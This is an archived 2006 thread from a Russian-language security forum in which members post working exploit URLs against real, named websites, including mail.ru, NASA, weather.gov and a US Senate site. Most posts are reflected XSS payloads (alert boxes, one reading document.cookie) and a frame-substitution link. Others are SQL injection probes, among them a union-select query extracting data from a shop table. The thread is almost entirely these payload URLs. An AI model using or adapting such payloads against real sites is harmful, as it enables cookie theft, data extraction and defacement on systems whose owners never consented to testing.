HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #161  
Старый 25.05.2006, 20:31
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

XSS на go.mail.ru
Не фильтруется: surl..
Код:
http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%2Burl%253D%2522www%2Edogcatalog%2Enet%252F%2A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE%25E7%25E4%25E0%25ED%25E8%25E5&surl=<script>alert('XSS')%3B</script>
Не фильтруется: id, iid, pageurl.
Код:
http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl="><script>alert('XSS')%3B</script>&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b
Не фильтруется: id, imgurl, iid, pageurl.
Код:
http://go.mail.ru/details.html?imgurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252Ffonoteka%252Fispol%252F576227168_tonnel%2Egif&id="><script>alert('XSS')%3B</script>&iid=2&pageurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252F%253Fl%253Dfonoteka%2526main%253D33&imgheight=421&imgwidth=300&ref=1&links=1&imgsize=9025
Подмена фрейма.
Код:
http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl=http://www.antichat.ru/&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b
__________________

Завтра будет.Лучше.

Последний раз редактировалось Go0o$E; 25.05.2006 в 21:45..
 

  #162  
Старый 25.05.2006, 20:31
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

 

  #163  
Старый 25.05.2006, 22:17
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


Arrow

И ещё xss на nasa, лолики они
_http://search.nasa.gov/nasasearch/search/advSearch.jsp?nasaInclude=%3CIMG+SRC%3D%60javascri pt%3Aalert%28%22slip%3A%27NASA+LOL%27%22%29%60%3E& qt=all&qx=&qm=anywhere&dct=Any+Type&dn=&dt=at&recP erPg=10&displayFormat=detail&sortBy=Scoredesc
__________________
..

Последний раз редактировалось sL(IP)--!(P.i.N.); 25.05.2006 в 22:24..
 

  #164  
Старый 25.05.2006, 22:26
Dagon
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602

Репутация: 52
По умолчанию

еще mail.ru
_http://astral.mail.ru/numer.php?mode=9&cnum=&fio="><script>alert(1)</script>&afio=test

_http://astral.mail.ru/sin.php?month=11&year=2005&month1=12&year1=2003<sc ript>alert(document.cookie)</script>
 

  #165  
Старый 25.05.2006, 22:38
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Cscript%3Ealert%28%2Fslip%2F%29%3 C%2Fscript%3E&method=exact
_http://www.sabrina.ru/search.php?action=shared_simple&bigboss=l_0&search _kind=and&action=shared_simple&phrase=%3Cscript%3E alert%28%2Fslip%2F%29%3C%2Fscript%3E&B1=
_http://goohoo.ru/search.bat?w=referats&q=%3Cscript%3Ealert%28%2Fsli p%2F%29%3C%2Fscript%3E
__________________
..

Последний раз редактировалось sL(IP)--!(P.i.N.); 25.05.2006 в 22:49..
 

  #166  
Старый 26.05.2006, 04:20
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

_http://mybb.ru/cat.php?go='
 

  #167  
Старый 26.05.2006, 18:55
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624

Репутация: 114
Отправить сообщение для EST a1ien с помощью ICQ
По умолчанию

[.GOV]
_http://fedbbs.access.gpo.gov/library/view/lib/?lib=%3Cscript%3Ealert('a1ien')%3C/script%3E
_http://www.weather.gov/glossary/index.php?letter=%3Cscript%3Ealert(/a1ien/)%3C/script%3E
_http://allard.senate.gov/public/index.cfm?FuseAction=Polls.Results&PollsPoll_id=16'&IsPopUp=True
 

  #168  
Старый 26.05.2006, 23:54
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

http://www.reusablebags.com/facts.php?id=-5+union+select+1,2,name,4,5,6,7+from+shop+where+id =1/*
 

  #169  
Старый 27.05.2006, 01:13
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Очень интересная вещь

_http://referat.kulichki.net/cgi-bin/refsearch/search.cgi?query=%3Cscript%3Ealert%28%2F[sL1p]%2F%29 %3C%2Fscript%3E&bool=or

PS Что бы всё нормально работало, уберите пробел между: ...2Fslip%2F%29 %3C%2Fscript%...
__________________
..

Последний раз редактировалось sL(IP)--!(P.i.N.); 27.05.2006 в 19:21..
 

  #170  
Старый 27.05.2006, 19:02
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Sql Injections на сайтах Укртелекома Nova Уязвимости 9 23.03.2006 00:35
"Яндекс" будет показывать контекстную рекламу на обычных сайтах dinar_007 Мировые новости. Обсуждения. 0 23.12.2005 16:22
Xss баги на забугорных сайтах... x-ultra-x Уязвимости 7 07.10.2005 17:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ